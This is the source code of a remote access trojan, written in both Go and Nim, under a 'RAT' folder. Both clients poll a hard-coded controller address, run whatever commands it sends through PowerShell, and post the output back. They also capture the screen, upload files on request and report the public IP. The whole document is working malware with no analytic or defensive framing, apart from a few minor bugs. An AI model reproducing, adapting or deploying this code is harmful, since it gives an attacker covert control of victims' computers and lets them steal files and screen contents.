File: RAT/host.go
package main

import (
    "encoding/base64"
	"encoding/json"
    "fmt"
    "io/ioutil"
    "net/http"
    "os"
	"bytes"
	"os/exec"
	"runtime"
	"strings"
    "time"
)


func GetCommand() string {
    client := http.Client{}
    loc, err := os.Getwd()
    if err != nil {
        panic(err)
    }
    locBase64 := base64.StdEncoding.EncodeToString([]byte(loc))
    
    defer client.CloseIdleConnections()
    resp, err := client.Get("http://192.168.1.5:8000/" + "command?q=" + locBase64)
    if err != nil {
        panic(err)
    }
    defer resp.Body.Close()
    body, err := ioutil.ReadAll(resp.Body)
    if err != nil {
        panic(err)
    }
    return string(body)
}


func PostRes(res string) {
	client := http.Client{}
	
	reqBody, err := json.Marshal(map[string]string{
		"data": res,
	})
	if err != nil {
		panic(err)
	}

	req, err := http.NewRequest("POST", "http://192.168.1.5:8000/"+"res", bytes.NewBuffer(reqBody))
	if err != nil {
		panic(err)
	}


	req.Header.Set("Content-Type", "application/json")


	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

}


func takeScreenshot() {
	
	filePath := "screenshot.png"

	
	var cmd *exec.Cmd
	if runtime.GOOS == "windows" {
		cmd = exec.Command("Powershell", "-Command", "$bmp = [System.Drawing.Bitmap]::new([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height); $graphics = [System.Drawing.Graphics]::FromImage($bmp); $graphics.CopyFromScreen([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.X, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Y, 0, 0, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Size); $bmp.Save('"+filePath+"', 'Png'); $graphics.Dispose(); $bmp.Dispose();")
	} else {
		fmt.Println("Unsupported OS")
		return
	}

	err := cmd.Run()
	if err != nil {
		fmt.Println("Error:", err)
		return
	}
	fmt.Println("Screenshot saved to", filePath)
}



func postFile(name string) {
	filePath := name
	file, err := os.Open(filePath)
	if err != nil {
		panic(err)
	}
	defer file.Close()

	fileData, err := ioutil.ReadAll(file)
	if err != nil {
		panic(err)
	}

	
	client := http.Client{}

	
	reqBody := bytes.NewReader(fileData)

	
	req, err := http.NewRequest("POST", "http://192.168.1.5:8000/"+"file/"+name, reqBody)
	if err != nil {
		panic(err)
	}

	
	req.Header.Set("Content-Type", "application/json")

	
	resp, err := client.Do(req)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

}



func ExecuteCommand(command string) string {
	
	cmd := exec.Command("Powershell", command)

	var stdout, stderr bytes.Buffer
	cmd.Stdout = &stdout
	cmd.Stderr = &stderr

	err := cmd.Run()
	if err != nil {

		fmt.Println("Error executing command:", err)
		return ""
	}

	return stdout.String()
}


func main() {
    for {
		
        command := GetCommand()
        if len(command) == 0 {
            time.Sleep(3 * time.Second)
            continue
        } else {
            if command == "screenshot" {
                takeScreenshot()
                postFile("path.png")
            } else if strings.Contains(command, "cd") {
                parts := strings.Split(command, " ")
                os.Chdir(parts[1])
            } else if strings.Contains(command, "sendfile") {
                parts := strings.Split(command, " ")
                postFile(parts[1])
            } else if command == "exit" {
                return
            } else {
                commandResult := ExecuteCommand(command)
                PostRes(commandResult)
            }
        }
    }
}

File: RAT/Host.nim
import std/[httpclient,json,base64]
import os,strutils,osproc,winim


var url="http://192.168.1.2:8000/"



proc GetCommand(client:HttpClient):string = 
    # var client = newHttpClient()
    try:
        var loc=os.getCurrentDir()
        return client.getContent(url&"command?q="&encode(loc))
    finally:
        client.close()

proc PostRes(client:HttpClient,res:string) =
    client.headers = newHttpHeaders({ "Content-Type": "application/json" })
    let body = %*{
        "data": res
    }
    try:
        let response = client.request(url&"res", httpMethod = HttpPost, body = $body)
    finally:
        client.close()

proc takeScreenshot(): void =
    var code="Add-Type -AssemblyName System.Windows.Forms;Add-Type -AssemblyName System.Drawing;$bitmap = New-Object System.Drawing.Bitmap([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Width, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Height);$graphics = [System.Drawing.Graphics]::FromImage($bitmap);$graphics.CopyFromScreen([System.Windows.Forms.Screen]::PrimaryScreen.Bounds.X, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Y, 0, 0, [System.Windows.Forms.Screen]::PrimaryScreen.Bounds.Size);$bitmap.Save({path.png});$graphics.Dispose();$bitmap.Dispose();"
    var res=execCmdEX("Powershell "&code)

proc postFile(client:HttpClient,name: string) =
  let data = readFile("path.png")
  client.headers = newHttpHeaders({"Content-Type": "application/json" })
  
  var body =data

  try:
    let response = client.request(url & "file/"&name, httpMethod = HttpPost, body = body)

  finally:
    client.close()

proc ExecuteCommand(commad:string) : string=
    var result = execCmdEx("Powershell "&commad, options = {},)
    return result.output

proc getPublicIPAddress(client:HttpClient): string =
    let response = client.get("https://api.ipify.org")
    return response.body.strip()

proc main() =
    # var ip=getPublicIPAddress()
    var client = newHttpClient()
    while true:
        var command=GetCommand(client)
        if command.len==0:
            sleep(3000)
            continue
        else:
            if command=="screenshot":
                takeScreenshot()
                postFile(client,"path.png")
            elif command.contains("cd"):
                var part=command.split(" ")
                os.setCurrentDir(part[1])
            elif command.contains("ip"):
                var ip=getPublicIPAddress(client)
                PostRes(client,ip)
            elif command.contains("sendfile"):
                var part=command.split(" ")
                postFile(client,part[1])
            elif command.contains("exit"):
                return
            else:
                var comm_res=ExecuteCommand(command)
                PostRes(client,comm_res)
main()
